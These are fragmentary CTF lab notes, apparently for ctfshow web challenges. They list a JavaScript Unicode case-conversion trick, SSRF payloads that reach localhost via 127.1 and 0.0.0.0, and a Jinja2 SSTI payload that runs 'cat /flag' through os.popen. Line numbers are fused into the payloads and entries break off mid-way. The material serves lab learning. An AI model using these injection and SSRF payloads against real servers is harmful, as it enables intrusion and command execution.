web334 little trick考察js特性: 参考 https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html
1234567toUpperCase():ı ==>Iſ ==>StoLowerCase():İ ==> ......
web351直接访问flag.php
POST传参
352 353限制了HTTP协议,ban掉了localhost和127.0.0.1
payload:
1234567url=http://127.1/flag.phpurl=http://0/flag.phpurl=http://0.0.0.0/flag.php ......
361 3621{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
363过滤引号
1{{config.__class ......